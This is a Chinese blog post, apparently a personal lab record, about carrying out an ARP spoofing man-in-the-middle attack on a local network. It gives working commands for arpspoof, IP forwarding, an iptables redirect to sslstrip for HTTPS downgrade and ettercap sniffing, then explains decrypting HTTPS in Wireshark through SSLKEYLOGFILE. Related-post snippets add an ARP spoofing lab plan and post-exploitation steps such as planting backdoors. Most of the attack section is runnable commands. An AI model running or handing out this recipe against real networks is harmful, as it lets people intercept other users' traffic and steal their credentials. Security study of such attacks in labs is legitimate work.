记录一次ARP欺骗+内网嗅探(wirshark抓取https)

已于 2023-08-04 14:33:59 修改
阅读量1.2k 收藏 8
点赞数 4
CC 4.0 BY-SA版权
文章标签: 网络 网络安全 linux
于 2023-08-04 11:47:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/akucoco/article/details/132101071
文章讲述了如何通过ARP攻击和欺骗实现中间人攻击,使用SSLstrip进行HTTPS降级,以及在遇到问题时如何借助Wireshark抓取HTTPS数据包的过程。重点介绍了SSLstrip的使用方法和Wireshark配置以获取HTTPS请求包。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目标IP: 192.168.0.38

kaliIP: 192.168.0.94

 网关IP: 192.168.0.1

1.对目标进行ARP攻击
arpspoof -i eth0 -t 192.168.0.38 192.168.0.1
2.对目标进行ARP欺骗
echo 1 >> /proc/sys/net/ipv4/ip_forward
3.修改配置文件
vim  /etc/ettercap/etter.conf

这里两个配置都要取消注释,不然无法打开ettercap(这里不去动配置文件也可以直接打开但无法使用iptables相关指令)

4.使用sslstrip进行https降级
攻击原理
攻击者利用用户对于地址栏中HTTPS与HTTP的疏忽,将所有的HTTPS连接都用HTTP来代替。同时,与目标服务器建立正常的HTTPS连接。由于HTTP通信是没有经过加密传输的,并没有HTTPS安全,所以攻击者能轻松实施嗅探。
​
1. 通过中间人攻击监听 http 流量
2. 更改重定向链接中的 location,替换 https 为 http,并记录
3. 更改响应内容中的超链接,替换 https 为 http,并记录
4. 与用户进行 http 通信,与服务器进行 https 通信(记录中本应是 https 的请求),从而明文获取用户信息
​
Tips:
​
当用户浏览的网页中包含https协议,会被转化为http协议的请求
但是sslstrip也不是万能的, 假如网页中没有https, 但是js代码绑定了跳转到https的协议请求的事件,那么sslstrip就失效了
安装sslstrip
apt install sslstrip
使用iptables将80端口数据转发到sslstrip监听端口
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(监听端口)
如果攻击完成后要删除这条记录可以输入命令 

iptables -t nat -D PREROUTING 1
​
查看 ip 转发表: iptables -t nat -L
sslstrip的使用
-w <文件名>,–write = <文件名>指定要登录的文件(可选)。
-p,–post仅记录SSL POST。(默认)
-s,–ssl记录往返服务器的所有SSL流量。
-a,–all记录往返服务器的所有SSL和HTTP通信。
-l <端口>,–listen = <端口>用于侦听的端口(默认为10000)。
-f,–favicon根据安全请求替换锁图标。
-k,–killsessions终止正在进行的会话。
-h 打印此帮助消息。
​
查看端口占用lsof -i tcp:10000
启动:
sslstrip -a -k -f -l 10000
使用ettercap进行嗅探
ettercap -Tq -i eth0

这里出现了问题,http能够正常嗅探,但https尝试了各个网站都无返回值,查看sslstrip.log发现出现报错,应该是https降级失败,这里告诉我说主机解析失败,这个实例应该是一个字节而不是字符串,但我并不能从它的报错信息中找到具体出错位置,各位大神有解决办法还望告知小弟

wirshark抓取https

上面ettercap因为https降级失败我尝试使用wirshark抓取数据包,但https发现只有返回包没有请求包,wirshark在默认情况下是抓不到https请求包的,下面是使用wirshark抓取https请求包的方法

1.建立ssl_key\sslog.log文件

2.添加系统环境变量

变量名称:SSLKEYLOGFILE

变量值:C:\ssl_key\sslog.log

3.配置wirshark

ctrl+shift+P打开配置文件

 选择protocols中的TLS,将日志文件放入其中(老版本的wirshark可能为SSL)

重启浏览器就可以抓到https的请求包了

wirshark抓取https原理

(1)客户端每次通信的时候都会随机生成一个私钥和服务器通信

(2)Wireshark 不知道不知道客户端/服务器私钥,所以无法解密 https 传输的数据包。

(3)某些浏览器如 Firefox 和 Chrome 支持将 TLS 会话中使用的客户端私钥/服务器端公钥用日记文件的方式记录下来,这样就可供 Wireshark 加密/解密使用

流量分析-Wireshark -操作手册(不能说最全,只能说更全)
路baby的博客
03-22 2万+
流量分析-Wireshark -操作手册(不能说最全,只能说更全) 基于各种比赛做的总解 基于协议过滤⼿法👍 常用筛选命令方法 常⽤快捷键👍 数据包筛选 顶峰相见
使用arp欺骗进行同一局域网内的抓包
nzyalj的博客
05-07 6975
环境 操作系统: MacOS 10.13.4 包管理工具:MacPorts 2.4.4 arp欺骗工具:arpspoof 2.4 抓取局域网内的IP地址的工具:nmap 7.70 抓包工具:Wireshark 2.4.3 前言 本来是想了解如何抢占带宽的,搜到了这么一篇文章:如何在局域网内抢带宽,里面提到了ARP欺骗,在网络管理课上貌似提到过ARP协议,乘机学习一下 ARP(A...
ARP欺骗攻击利用之抓取https协议的用户名与密码
2301_81475812的博客
02-08 1796
找到下红框的内容,输入字母i进入编辑模式,把#注释符去掉,按键盘右上角ESC键退出编辑模式,进入命令行模式,同时按住shift键与冒号键:然后输入wq进行保存并退出。因此,这个命令的作用是在中间人攻击中使用sslstrip工具将HTTPS连接转换为HTTP连接,并将所有请求重定向到攻击者控制的设备上,同时忽略证书错误。命令执行:apt-get install sslstrip。-T:启动文本模式 q:安静模式 -i:攻击机网卡。命令执行:sslstrip -a -f –k。启动第二kali终端。
Kali:ARP欺骗的各种玩法——嗅探流量、限速、断网操作
最新发布
wly55690的博客
05-15 955
ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。
利用sslstrip和ettercap突破ssl嗅探密码
gold0523的专栏
11-16 1781
本教程不是原创,是使用黑帽大会上Moxie Marlinspike发布的一款叫sslstrip的工具,配合ettercap进行arp欺骗,可以突破经过ssl加密的协议(https等,一种被动使用https协议的会受到攻击),进行局域网arp嗅探获得口令等信息。本教程不涉及原理,只讲应用,我尽量迅速录完节省大家时间 仍然跟大家说声抱歉,因为个人原因最近比较惆怅,因此不爱说话,所以还是不录语音教
https传输过程嗅探
weixin_34195546的博客
12-06 1516
C1->浏览器告知服务器自身的信息 length = 165 a5 16 03 01 00 A0 01 00 00 9C 03 03 5E 1C 37 CD 40 [ ^ 7 @] B6 4A 9A 1A BC 43 85 2D 91 6E 24 D1 CB 98 D2 67 [ J C - n$ g] 30 7B B9 34 F6 34 14 5...
ARP嗅探过程
九天
09-08 1657
经过一系列方法拿下主机权限后: 1、安装后门软件,通过注册表或输入命令把自己添加到admin group组中 2、上传nc(一个黑客工具)打开mstsc服务(3389服务),在命令行输入net user命令查看当前是否有管理员在线。 3、安装winpcap软件,安装arp sniffer进行网络嗅探 4、arp sniffer的使用方法,在cmd(命令行)下输入arpsni
网络攻击与防范 --- Wireshark网络嗅探
阿兰的博客
04-01 1081
利用工具wireshark完成抓包作业,要求抓到三次握手,四次挥手,telnet帐号和口令,ftp帐号和口令的报文,尝试抓arp,icmp,http,tcp,udp的包,并做简要的协议分析,截图后完成实验报告。
Wireshark数据抓包教程之Wireshark捕获数据
aoe41606的博客
02-06 1369
Wireshark数据抓包教程之Wireshark捕获数据 Wireshark抓包方法 在使用Wireshark捕获以太网数据,能够捕获分析到自己的数据包,也能够去捕获同一局域网内,在知道对方IP地址的情况下,捕获到对方的数据包。 Wireshark捕获自己的数据包 假...
网络渗透实验二 网络嗅探与身份认证
JNpvA的博客
11-17 546
实验目的: 1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。 2、研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof实现ARP欺骗以捕获内网其他用户数据。 3、能利用BrupSuite实现网站登录暴力破解获得登录密码。 4、能实现ZIP密码破解,理解安全密码的概念和设置。 系统环境:Kali Linux 2、Window
ARP欺骗网络监听实验方案 一、实验环境配置 1. 网络拓扑设计 攻击机:Kali Linux(工具:`arpspoof`、`Wireshark`、`ettercap`) 被监听目标:Windows 10 或 Linux 主机(IP:`192.168.1.100`) 网关:路由器或虚拟网关(IP:`192.168.1.1`) 网络模式:所有主机处于同一局域网(子网掩码 `255.255.255.0`) 2. 虚拟机/物理机配置 使用 VMware/VirtualBox 搭建 Kali 和 Windows 虚拟机,网络模式设置为 桥接或 NAT(需确保同网段。 确保 Kali 启用 IP 转发功能(`sysctl -w net.ipv4.ip_forward=1`)。 二、攻击方案设计 1. ARP欺骗原理 攻击机伪造网关的 ARP 响应,使被监听主机认为攻击机是网关。 同时伪造被监听主机的 ARP 响应,使网关认为攻击机是被监听主机。 流量经过攻击机转发,实现双向监听。 2. 工具选择 arpspoof:用于发送伪造 ARP 响应。 ettercap:集成 ARP 欺骗、流量劫持和协议分析功能。 Wireshark:抓包分析明文通信(如 HTTP、FTP)。 3. 攻击流程 步骤1:扫描局域网主机,确认目标 IP 和网关 IP。 步骤2:开启 IP 转发,防止目标断网。 步骤3:发送伪造 ARP 包,劫持目标与网关通信。 步骤4:使用 Wireshark 抓取流量并分析敏感信息。 三、实验验证步骤 1. 实验环境搭建(截图示例) Kali 配置 查看 Kali IP ifconfig eth0 启用 IP 转发 echo 1 > /proc/sys/net/ipv4/ip_forward Windows 主机配置 确认 IP 地址为 `192.168.1.100`,网关为 `192.168.1.1`。 2. ARP欺骗攻击(以 arpspoof 为例) 对目标主机发送伪造网关 ARP 响应 arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 对网关发送伪造目标主机 ARP 响应 arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 3. 流量监听(Wireshark) 在 Kali 中打开 Wireshark,选择网卡 `eth0`,过滤 HTTP 流量: http.request.method == "GET" 目标主机访问 HTTP 网站(如未加密登录页面),Wireshark 可捕获明文账号密码。 4. 验证 ARP 表篡改 在目标主机执行 `arp -a`,确认网关 MAC 地址已被替换为攻击机 MAC。 请在全站中搜素与我的实验方案最接近的博客或者文章,提供链接给我
03-08
好的,用户想找关于ARP欺骗网络监听实验方案的博客或文章,特别是使用Kali Linux中的工具如arpspoof、Wireshark、ettercap,涉及局域网主机扫描、IP转发、伪造ARP响应和流量分析的内容。首先,我需要回顾用户提供...
Httplook(HTTP嗅探器_捕捉HTTP通讯)v1.25.1中文特别版(附注册码)
07-30
HTTPLook 是一个 HTTP 的嗅探器,它能捕捉本机与其它任何主机的 HTTP 通讯(不是 HTTPS 哦 ),然后显示详细的 HTTP 操作(如 GET/POST)、访问资源的 URL 、字节数大小等,这个软件简单易用,不用对 Internet Explorer 做任何其它设置(有的软件通过在 IE 中设置代理来监控数据),也不需要其它任何软件的支持,是一款较为绿色的、轻量级的软件 安装说
基于ARP网络嗅探
04-05
在windows平台上使用VC开发工具设计一个利用ARP及WinPcap的特性具有网络嗅探功能的应用程序并进行功能测试。
局域网ARP欺骗
u013115811的博客
09-16 760
局域网ARP欺骗   使用Ubuntu与我的手机做实验, 欺骗路由器将回应手机的信息发到Ubuntu中去, 再进行抓包分析等. 1.发现目标IP   可使用arp-scan -l或fpring(高级版ping)   如下使用fpring, 基本用法: fping批量扫描主机 fping -g -r 0 -s 192.168.0.0/24   结果得到5个状态为active,...
基于ARP和WinPcap的网络嗅探
繁华落尽梦一场
04-03 653
WinPcap是windows下的一个开源库,简单来说就是用户自己可以发送数据包,比如windows XP之后就不能用socket发送SYN数据包了,因为操作系统进行了封装。所以想要发送自己的数据包,就要绕开操作系统,WinPcap就提供了这样的功能。      再说ARP——地址解析协议,ARP是数据链路层的协议。一般来说,一个局域网会用一个或多个路由器与Internet连接,那么当外部数据要
12.4、后渗透测试--内网主机数据包流量嗅探
无痕的博客
12-14 450
metasploit后渗透meterpreter测试--内网主机数据包流量嗅探
使用 Wireshark 实现 ARP 嗅探监听网络
Flag少侠的博客
04-26 1580
ARP嗅探ARP Spoofing)是一种网络攻击技术,攻击者通过欺骗局域网内的设备,获取其通信中的敏感信息。ARP(Address Resolution Protocol)是用于将IP地址映射到MAC地址的协议,攻击者通过ARP欺骗来伪造网络设备的MAC地址,以获取网络流量或中间人攻击。下面是ARP嗅探的工作原理:1. 攻击者发送ARP请求:攻击者在局域网内发送一个ARP请求,询问目标设备的MAC地址,但将源IP地址设置为受害者的IP地址。
【python中级】基于ARP协议的局域网内MAC地址和IP地址的嗅探
jn10010537的博客
05-24 964
【python中级】基于ARP协议的局域网内MAC地址和IP地址的嗅探1、背景2、安装包3、代码 1、背景 关于场景: 你在办公室安装了几台IPC,但是可能经常会记不清这些IPC的IP地址,很烦人。 本博客基于ARP协议,将局域网内MAC地址和IP地址寻找出来。 ARP即Address Resolution Protocol地址解析协议。 ARP是依据IP地址获得MAC地址的一个TCP/IP协议。 ARP协议的主要功能是将IP地址解析为物理地址,使用ARP协议可根据网络层IP数据包包头中的IP地址信息解析出
ARP渗透与攻防()之WireShark截获用户数据
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-23 2275
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。ARP攻击主要是存在于局域网网络中,局域网中若有一台计算机感染ARP木马,则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值